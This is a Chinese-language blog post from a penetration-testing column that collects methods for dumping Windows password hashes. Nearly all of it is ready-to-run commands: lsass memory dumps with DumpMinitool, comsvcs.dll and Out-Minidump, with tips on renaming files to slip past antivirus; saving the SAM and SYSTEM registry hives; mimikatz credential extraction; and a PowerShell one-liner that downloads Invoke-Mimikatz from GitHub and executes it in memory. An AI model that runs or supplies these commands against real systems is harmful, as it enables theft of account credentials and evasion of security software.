dump hash常见方法总结

最新推荐文章于 2024-05-23 23:39:55 发布
最新推荐文章于 2024-05-23 23:39:55 发布
阅读量1.3k 收藏 1
点赞数
分类专栏: 内网渗透 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44747030/article/details/127136474
版权

dump hash 常见方式总结

DumpMinitool dump hash

在这里插入图片描述

dump lsass进程

DumpMinitool.exe --file 1.txt --processId 948 --dumpType Full

--file 保存文件名为1.txt 规避一下杀软
--processId  lsass.exe 进程号

杀软无拦截

查看1.dmp

sekurlsa::minidump "1.dmp"

sekurlsa::logonpasswords

在这里插入图片描述

注册表读取hash

reg save HKLM\SYSTEM C:\windows\temp\Sys.hiv
reg save HKLM\SAM C:\windows\temp\Sam.hiv

privilege::debug
sekurlsa::logonpasswords
# mimikatz运行解密命令
lsadump::sam /sam:Sam.hiv /system:Sys.hiv

mimikatz 读取内存中的密码

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit

procdump lsass.exe进程

可以在任务管理器中对着lsass.exe进程  create dump file  dump下来得文件使用mimikatz解开

mimikatz命令
(使用以下命令针对 lsass.dmp 文件启动 mimikatz alpha:)
privilege::debug

sekurlsa::minidump C:\Users\PunchMan\Desktop\lsass.dmp

sekurlsa::logonPasswords full
or
sekurlsa::logonPasswords

在这里插入图片描述

在这里插入图片描述

使用Powershell远程加载mimikatz

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds

在这里插入图片描述

  • 本地调用Mimikatz读密码
    PowerShell因为在此系统中禁止执行脚本
    用管理员权限打开powershell并执行 set-ExecutionPolicy RemoteSigned即可.

mimikataz 读取转存后得文件

mimikatz命令读取密码
mimikatz.exe privilege::debug 
cd 到转存的文件目录
sekurlsa::logonpasswords full exit

comsvcs.dll 需要管理员权限得powershell

powershell 执行

.\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\temp\lsass.dmp full

此时我们想到,把这个 comsvcs.dll 复制到其他随意目录并取个新的名字,叫test.dll绕过杀软

在这里插入图片描述

在这里插入图片描述

PowerSploit* 脚本 Out-MiniDump.ps1(截止2022.2.8有效)

使用 PowerSploit 的Out-MiniDump模块,PowerSploit是一个基于 Powershell 的渗透工具包,可以选择创建进程的完整内存转储。工具项目地址:https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1

Import-Module .\Out-Minidump.ps1
Get-Process lsass | Out-Minidump

在这里插入图片描述

blob/master/Exfiltration/Out-Minidump.ps1

Import-Module .\Out-Minidump.ps1
Get-Process lsass | Out-Minidump

在这里插入图片描述

evilxpl
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
msf 使用 hashdump 和 wce 提取 hash
发哥微课堂
01-21 1万+
0x00:介绍 msf 在获取 shell 后为了更方便的进行渗透测试,可获取主机的 hash 以及域的 hash,即用户的密码,存在于 c 盘下的 windos 下的 system32 下的 config 下的 sam 文件中,以 hash 加密的方式存储,而系统开机后,hash 密码会以明文存在于内存中,获取 hash 的工具和方法有很多,这一节记录下 hashdump 和 wce 的使用。...
Hash dump神器 (转)
weixin_34192816的博客
10-22 493
在Win7 x64位下无压力测试通过。   0 / INTRO========= Quarks PwDump 是一个Win32环境下的系统授权信息导出工具,目前除此之外没有任何一款工具可以导出如此全面的信息,支持这么多的OS版本,且相当稳定。 它目前可以导出 :- Local accounts NT/LM hashes + history 本机NT/LM哈希+历史登录记录– Domai...
Hidedumpdumplsass加密免杀工具
记录学习,一起进步
05-23 1102
dumplsass
内网安全:05.dump内网DC的ntds.dit,获取hash
qq_38461724的博客
07-05 157
叙述:有时候我们碰到一个内网环境,有DC的密码,于是使用这个方法,导出DC中所有内网主机的密码并破解 0x0 环境 DC:172.31.20.30  domain用户:pentest\administrator 密码:UFhae&pwL%F 内网主机A(win 2012):172.31.21.166 psexec:https://docs.microsoft.com/en-us/sysinternals/downloads/psexec secretsdump:https://github.co.
windows hash 抓取(dump)工具 - quarkspwdump
海阔天空
03-18 6719
本机测试:Windows7 64位     Quarks PwDump 是一款开放源代码的Windows用户凭据提取工具,它可以抓取windows平台下多种类型的用户凭据,包括:本地帐户、域帐户、缓存的域帐户和Bitlocker。作者开发这个工具的原因是现在没有一款工具能同时抓取所有类型的hash和Bitlocker信息。这个工具没有注入任何进程,工作原理是神马呢,源代码值得读一下。
[译]从域控制器中dump hash
iteye_16188的博客
11-21 266
原文地址:http://www.kioptrix.com/blog/recovering-hashes-from-domain-controller-2/ 本方法属于后渗透测试,需要管理员/system权限。 首先我们需要一些准备。VSSOwn是一个很好的脚本,它本质上帮我们创建一个Windows域控制器盘符的volume shadow copy,从而我们可以提取NTDS和SYSTEM文件...
Oracle常用dump命令,记录一下备查。
09-14
Oracle常用dump命令详解 Oracle dump命令是Oracle数据库管理员和开发者在日常工作中经常使用的命令之一。该命令可以帮助用户快速地获取数据库的各种信息,包括Global Area、Library Cache、Row Cache、Buffers、...
php常用函数总结.xls
03-27
本文件“php常用函数总结.xls”显然是一个整理了PHP常用函数的资源,方便开发者查阅和学习。下面我们将深入探讨一些PHP中的关键函数类别及其用途。 1. **字符串处理函数**: - `strlen()`:计算字符串的长度。 - ...
Django中redis的使用方法(包括安装、配置、启动)
09-09
- Redis支持多种数据类型,如`string`、`hash`、`list`、`set`和`zset`。 - 键的常见操作: - 查找所有键:`keys *`。 - 检查键是否存在:`exists key`。 - 获取键类型:`type key`。 - 删除键:`del key`。 ...
Oracle DBA常用语句第1/2页
09-11
以下是一些Oracle DBA常用的SQL语句,涵盖了表空间、回滚段、控制文件、日志文件、会话信息、字符集、SQL优化器模式以及跟踪文件的查询方法。 1. **查看表空间及其大小**: 使用以下语句可以获取所有表空间的名称...
Hash dump的神器----quarkspwdump
jackywu1010的专栏
08-09 7299
先看简介 Quarks PwDump是一个Win32环境下系统授权信息导出工具,目前除此之外还木有没有任何一款工具可以导出如此全面的信息,支持这么多的OS版本, (包括xP/2003/Vista/7/2008/8),经测试相当稳定。 作者开发这个工具的原因是现在没有一款工具能同时抓取所有类型的hash和Bitlocker信息。 这个工具没有注入任何进程,工作原理是神马呢,源代码值得读一下。
lsass杀毒软件
12-19
解决实际问题,因为这些毒大多在注册表中,lsass.exe 和smss.exe
绕过360实现lsass转储
hongduilanjun的博客
04-18 930
前言 获取Windows用户的凭证信息是渗透过程中至关重要的一步。 没杀软,只要有权限想怎么读就怎么读。 有杀软,得用一些特别的技巧。 注:本机所有测试均为物理机,且为最新版AV Mimikatz直接读取Lsass进程 权限提升 privilege::debug 抓取密码 sekurlsa::logonpasswords [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-BSPqd5Xv-1650257094211)(image-20220411145456534.png
hashdump获得XP的用户密码的hash
天元喜羊羊的博客
04-21 5858
入侵XP成功后,命令: use priv run post/windows/gather/hashdump 这样就可以获得用户的密码的hash值了。
HashMap工具类
qq_39665053的博客
12-14 928
一个HashMap的工具类, 包含简单的创建, 简单的分组, 简单分组后的获取 public class MapUtils { /** * 通过一个键值对创建一个HashMap * @param key 键 * @param value 值 * @param <K> 键的类型 * @param <V> 值的类型 ...
hash扩展长度攻击及hashdump使用
weixin_30896763的博客
12-11 434
摘自: 1、http://www.freebuf.com/articles/web/69264.html 2、https://www.cnblogs.com/pcat/p/5478509.html 0×01 引言 为什么会想到这个呢?上周末做了“强网杯”的童鞋们应该都能知道吧,它其中有个密码学的题目就是考的这一点。 0×02 sha1的hash原理 说到要解释sha1的原理其实是非常复...
AD攻防-域用户HashDump追踪之道
喜欢Python编程的程序员柚柚呀
08-24 817
it,网上dump域用户hash的方式五花八门,少有站在防御者视角对不同的dump方式进行梳理剖析和取证定位的文章,掌握不同dump方式的底层原理才能在EDR对抗时不慌不乱、在应急响应中抓住重点,选择最适合的手段快速达到自己的目的。本文大纲如下:![AAA-
Hash扩展长度攻击及Hashdump的使用
ZXT02的博客
11-22 559
Hash扩展长度攻击、Hashdump的使用和相关CTF题目
从域控制器中dump hash(二)
iteye_16188的博客
11-21 163
参考:[url]http://blog.cyberis.co.uk/2012/06/password-audit-of-domain-controller.html[/url] 1. 创建Shadow Copy [quote] cscript vssown.vbs /start cscript vssown.vbs /create c cscript vssown.vbs /list...
json的dumpdumps方法的区别
最新发布
05-30
在Python中,JSON是一种非常常用的数据交换格式。JSON格式的数据可以通过Python内置的json模块进行处理。其中,json模块提供了两个主要的方法dump()和dumps()。 其中,dump()方法将Python对象转换为JSON格式的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值